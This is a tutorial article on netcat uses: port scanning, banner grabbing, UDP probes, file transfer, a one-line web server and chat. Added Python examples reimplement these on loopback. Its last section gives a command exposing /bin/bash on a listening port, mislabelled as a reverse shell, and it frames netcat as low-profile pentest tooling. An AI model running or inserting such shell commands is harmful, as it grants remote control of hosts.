Useful Netcat Tricks

    In this article I will review the popular netcat network utility and some useful tricks for working with it.


    Netcat is a Unix utility that lets you establish TCP and UDP connections, receive data over them and send data through them. Despite its usefulness and simplicity, many people do not know how to use it and undeservedly pass it over.


    Using this utility, you can carry out some steps of a penetration test. This is useful when the target machine lacks the usual tooling (or installing it would attract attention), when the platform is restricted (for example, IoT / embedded devices), and so on.


    What can be done with netcat:


    • Scan ports;
    • Port forwarding;
    • Collect service banners;
    • Listen on a port (bind for a reverse connection);
    • Download and upload files;
    • Display raw HTTP content;
    • Create a mini chat.

    In general, netcat can replace a number of Unix utilities, so this tool can be considered a kind of Swiss-army knife for certain tasks.


    Practical examples


    In many cases, when a particular host needs to be checked, people reach for telnet or for the service's own client tools to identify the host or its banner. Here is how netcat can help us:


    Check for open TCP port 12345


    $ nc -vn 192.168.1.100 12345

    nc: connect to 192.168.1.100 12345 (tcp) failed: Connection refused

    $ nc -v 192.168.1.100 22

    Connection to 192.168.1.100 22 port [tcp/ssh] succeeded!
    SSH-2.0-OpenSSH

    Scan TCP ports using netcat:


    $ nc -vnz 192.168.1.100 20-24

    With the -z flag netcat sends no data over the connection: it only reports whether the connection to each port succeeded:


    nc: connectx to 192.168.1.100 port 20 (tcp) failed: Connection refused
    nc: connectx to 192.168.1.100 port 21 (tcp) failed: Connection refused
    found 0 associations
    found 1 connections:
    1: flags = 82 <CONNECTED, PREFERRED>
    outif en0
    src 192.168.1.100 port 50168
    dst 192.168.1.100 port 22
    rank info not available
    TCP aux info available
    Connection to 192.168.1.100 port 22 [tcp / *] succeeded!
    nc: connectx to 192.168.1.100 port 23 (tcp) failed: Connection refused
    nc: connectx to 192.168.1.100 port 24 (tcp) failed: Connection refused
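    The TCP checks above (a single `nc -v host port` with banner collection, and the zero-I/O `nc -vnz host range` scan) reimplemented on plain sockets, as an added example that is not part of the original article and not netcat's own code. It uses only the Python standard library; the loopback listener, the `SSH-2.0-OpenSSH_demo` banner and the port numbers are constructed for the demonstration. The point it makes beyond the article is which TCP outcome stands behind each line netcat prints: a RST gives "Connection refused", a completed handshake gives "succeeded!", and silence (usually a firewall dropping the SYN) gives a timeout.

```python
"""Added example, not from the article: `nc -v host port` and `nc -vnz host
range` on plain sockets.  The listener, banner and ports are constructed."""
import socket
import threading

TIMEOUT = 1.0


def tcp_probe(host, port, timeout=TIMEOUT, grab_banner=True):
    """Return (state, banner) for one TCP port.

    'refused' : the host answered with RST   (netcat: 'Connection refused')
    'timeout' : nothing came back, typically a filtering firewall
    'open'    : the handshake completed      (netcat: 'succeeded!')
    With grab_banner=False this is the -z behaviour: connect, then close
    without sending or reading anything.
    """
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            if not grab_banner:
                return "open", ""
            s.settimeout(timeout)
            try:
                banner = s.recv(256)
            except socket.timeout:
                banner = b""  # service expects the client to speak first (e.g. HTTP)
            return "open", banner.decode("ascii", "replace").strip()
    except ConnectionRefusedError:
        return "refused", ""
    except socket.timeout:
        return "timeout", ""
    except OSError:
        return "error", ""


def scan_tcp(host, ports, timeout=TIMEOUT):
    """Equivalent of `nc -vnz host 20-24`: returns only the open ports."""
    return [p for p in ports
            if tcp_probe(host, p, timeout, grab_banner=False)[0] == "open"]


# ---- constructed local services for the demonstration -------------------
def start_banner_service(banner=b"SSH-2.0-OpenSSH_demo\r\n"):
    """Accept connections on a free loopback port and send a banner, the way
    sshd greets a client.  Returns the port number."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(8)

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return
            with conn:
                try:
                    conn.sendall(banner)
                except OSError:
                    pass

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]


_reserved = []  # keeps the bound-but-not-listening sockets alive


def reserve_closed_port():
    """Bind a loopback port without listen(), so a connect() to it is
    reliably refused and no other process can grab it meanwhile."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(("127.0.0.1", 0))
    _reserved.append(s)
    return s.getsockname()[1]


def demo():
    open_port = start_banner_service()
    closed_port = reserve_closed_port()
    state, banner = tcp_probe("127.0.0.1", open_port)
    return {
        "open": (state, banner),
        "closed": tcp_probe("127.0.0.1", closed_port)[0],
        "scan": scan_tcp("127.0.0.1", [closed_port, open_port]),
        "open_port": open_port,
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

    Running the block prints the banner for the open port, "refused" for the reserved one, and a scan result containing only the open port. Against real hosts replace the loopback addresses; the timeout branch is the one you will see most often from filtered ports.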

    Scan UDP ports.


    Root privileges are required to scan UDP ports using nmap. If there are none, then the netcat utility can also help us:


    $ nc -vnzu 192.168.1.100 5550-5560

    Connection to 192.168.1.100 port 5555 [udp / *] succeeded!

    Sending UDP packet


    $ echo -n "foo" | nc -u -w1 192.168.1.100 161

    This can be useful when interacting with network devices.


    Receiving data on a UDP port and outputting received data


    $ nc -u localhost 7777

    Netcat exits after the first message arrives. If you need to accept several messages, wrap it in while true:


    $ while true; do nc -u localhost 7777; done
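    The three UDP operations above (sending one datagram as `echo -n "foo" | nc -u -w1` does, the `nc -vnzu` port check, and receiving several messages on a UDP port) on plain sockets, as an added example that is not part of the original article and not netcat's code. It uses only the Python standard library; the loopback echo service and the payloads are constructed. It also shows the caveat the article's UDP scan output hides: UDP has no handshake, so "succeeded" only means no ICMP port-unreachable came back, which is also what you see for a filtered port or a service that ignores an unknown datagram. A connected UDP socket surfaces the ICMP error as ECONNREFUSED on Linux and macOS; other platforms may report silence instead, which is why the probe distinguishes `closed` from `open|filtered`.

```python
"""Added example, not from the article: `echo -n foo | nc -u -w1`, `nc -vnzu`
and a UDP receive loop on plain sockets.  Echo service and payloads are
constructed for the demonstration."""
import socket
import threading


def udp_send(host, port, payload, wait=1.0):
    """`echo -n payload | nc -u -w1 host port`: send one datagram, then wait
    up to `wait` seconds for a reply.  Returns the reply bytes or None."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(wait)
        s.sendto(payload, (host, port))
        try:
            data, _ = s.recvfrom(65535)
            return data
        except (socket.timeout, ConnectionRefusedError):
            return None


def udp_probe(host, port, wait=1.0):
    """What `nc -vnzu` can and cannot tell you about a UDP port.
      'closed'        : ICMP port unreachable came back (ECONNREFUSED on a
                        connected UDP socket, Linux/macOS)
      'open'          : the service actually answered
      'open|filtered' : silence; open, filtered, or a service that ignores
                        an unsolicited datagram - indistinguishable here"""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(wait)
        s.connect((host, port))
        try:
            s.send(b"\x00")
            s.recv(65535)
            return "open"
        except ConnectionRefusedError:
            return "closed"
        except socket.timeout:
            return "open|filtered"


def udp_receive(sock, count, wait=2.0):
    """The `while true; do nc -u ...; done` idea done with one socket that
    stays bound: re-creating the socket per message (what the shell loop
    does) loses datagrams that arrive between two netcat processes."""
    sock.settimeout(wait)
    got = []
    while len(got) < count:
        try:
            data, _ = sock.recvfrom(65535)
        except socket.timeout:
            break
        got.append(data)
    return got


# ---- constructed local service for the demonstration --------------------
def start_echo_service():
    """Answer every datagram with b'echo:' + payload.  Returns the port."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    srv.bind(("127.0.0.1", 0))

    def serve():
        while True:
            try:
                data, peer = srv.recvfrom(65535)
                srv.sendto(b"echo:" + data, peer)
            except OSError:
                return

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]


def demo():
    echo_port = start_echo_service()
    reply = udp_send("127.0.0.1", echo_port, b"foo")
    probe_open = udp_probe("127.0.0.1", echo_port)

    # A port nobody is bound to: bind, note the number, release it.
    tmp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    tmp.bind(("127.0.0.1", 0))
    closed_port = tmp.getsockname()[1]
    tmp.close()
    probe_closed = udp_probe("127.0.0.1", closed_port)

    # Receive three messages on one bound socket while another thread sends.
    listener = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    listener.bind(("127.0.0.1", 0))
    received = []
    t = threading.Thread(target=lambda: received.extend(udp_receive(listener, 3)))
    t.start()
    for i in range(3):
        udp_send("127.0.0.1", listener.getsockname()[1], b"msg%d" % i, wait=0.05)
    t.join()
    listener.close()
    return {"reply": reply, "probe_open": probe_open,
            "probe_closed": probe_closed, "received": received}


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

    `udp_probe` sends a single null byte, the same thing `nc -z` does; whether a real service answers it depends on the protocol, which is why an answer means "open" but silence proves nothing.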

    File transfer. Using netcat, you can either receive files or transfer them to a remote host:


    nc 192.168.1.100 5555 < 1.txt

    nc -lvp 5555 > /tmp/1.txt
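    The transfer pair above (`nc host 5555 < 1.txt` on the sender, `nc -lvp 5555 > /tmp/1.txt` on the receiver) on plain sockets, as an added example that is not part of the original article and not netcat's code. It uses only the Python standard library and creates its files in a temporary directory. It adds the check netcat itself never performs: the receiver only knows the transfer is complete because the sender closed the connection, and nothing on the wire protects the bytes, so both ends should compare a SHA-256 of the file (and anything sensitive should go through an authenticated channel instead).

```python
"""Added example, not from the article: `nc host port < file` and
`nc -l port > file` on plain sockets, plus a SHA-256 comparison of both
ends.  The source file is constructed in a temporary directory."""
import hashlib
import os
import socket
import tempfile
import threading


def sha256_of(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def receive_file(listener, dest_path):
    """Receiver side (`nc -l port > dest`): accept one connection and write
    everything until the peer closes.  Returns the number of bytes written."""
    conn, _ = listener.accept()
    written = 0
    with conn, open(dest_path, "wb") as out:
        while True:
            chunk = conn.recv(65536)
            if not chunk:        # EOF: the sender closed its socket
                break
            out.write(chunk)
            written += len(chunk)
    return written


def send_file(host, port, src_path):
    """Sender side (`nc host port < src`): stream the file, then close the
    socket so the receiver sees EOF and stops."""
    with socket.create_connection((host, port), timeout=5) as s, \
            open(src_path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            s.sendall(chunk)


def demo():
    tmp = tempfile.mkdtemp()
    src = os.path.join(tmp, "1.txt")
    dst = os.path.join(tmp, "received.txt")
    with open(src, "wb") as f:
        f.write(os.urandom(200_000))      # constructed payload

    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))
    listener.listen(1)
    port = listener.getsockname()[1]

    result = {}
    t = threading.Thread(
        target=lambda: result.update(written=receive_file(listener, dst)))
    t.start()
    send_file("127.0.0.1", port, src)
    t.join()
    listener.close()
    return {
        "size": os.path.getsize(src),
        "written": result["written"],
        "digest_match": sha256_of(src) == sha256_of(dst),
    }


if __name__ == "__main__":
    print(demo())
```

    In practice you would run `sha256sum 1.txt` on both machines after a netcat transfer; the digest comparison in `demo()` is the same check done in-process.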

    Netcat as the simplest web server.


    Netcat can serve as the simplest web server for displaying HTML pages.


    $ while true; do nc -lp 8888 < index.html; done

    Then open http://<netcat host>:8888/index.html in a browser. To use the web server's standard port 80, nc has to run with root privileges:


    $ while true; do sudo nc -lp 80 < test.html; done
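    What the `while true; do nc -lp 8888 < index.html; done` loop does, and what it leaves out, as an added example that is not part of the original article and not netcat's code. It uses only the Python standard library; the page body and the port are constructed. Netcat hands the same bytes to every client regardless of the requested path and never sends an HTTP status line or headers; the handler below reads the request head (the raw HTTP that netcat would print to the terminal), ignores the path just as netcat does, and adds the status line and Content-Length that make the response well-formed.

```python
"""Added example, not from the article: a one-file HTTP responder that does
what `nc -lp 8888 < index.html` does, but with a proper status line and
headers.  Page body and port are constructed for the demonstration."""
import http.client
import socket
import threading

INDEX_HTML = b"<html><body><h1>netcat demo</h1></body></html>\n"


def serve_once(listener, body, content_type="text/html"):
    """Accept one client, read its request head, answer with `body`, and
    return the request line that was seen.  The path is ignored on purpose:
    that is exactly what netcat does when fed a file on stdin."""
    conn, _ = listener.accept()
    with conn:
        conn.settimeout(2)
        head = b""
        while b"\r\n\r\n" not in head:
            chunk = conn.recv(4096)
            if not chunk:
                break
            head += chunk
        request_line = head.split(b"\r\n", 1)[0].decode("latin-1")
        response = (b"HTTP/1.1 200 OK\r\n"
                    b"Content-Type: " + content_type.encode() + b"\r\n"
                    b"Content-Length: " + str(len(body)).encode() + b"\r\n"
                    b"Connection: close\r\n"
                    b"\r\n" + body)
        conn.sendall(response)
    return request_line


def demo():
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))
    listener.listen(1)
    port = listener.getsockname()[1]

    seen = []
    t = threading.Thread(target=lambda: seen.append(serve_once(listener, INDEX_HTML)))
    t.start()

    # A real HTTP client fetching the page, standing in for the browser.
    client = http.client.HTTPConnection("127.0.0.1", port, timeout=5)
    client.request("GET", "/index.html")
    resp = client.getresponse()
    body = resp.read()
    client.close()
    t.join()
    listener.close()
    return {"status": resp.status, "body": body, "request_line": seen[0]}


if __name__ == "__main__":
    print(demo())
```

    Wrap `serve_once` in a `while True:` loop to get the same behaviour as the shell loop, one client at a time.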

    Chat between hosts


    On the first node (192.168.1.100):


    $ nc -lp 9000

    On the second node:


    $ nc 192.168.1.100 9000

    After running the commands, every character typed in the terminal window on either node appears in the terminal window of the other.


    Reverse shell


    Using netcat, you can set up a convenient reverse shell:


    nc -e /bin/bash -lp 4444

    Now you can connect to the remote host:


    $ nc 192.168.1.100 4444

    Do not give up when the specialised tools, which are often quite bulky, are not available: sometimes the problem can be solved with improvised means.

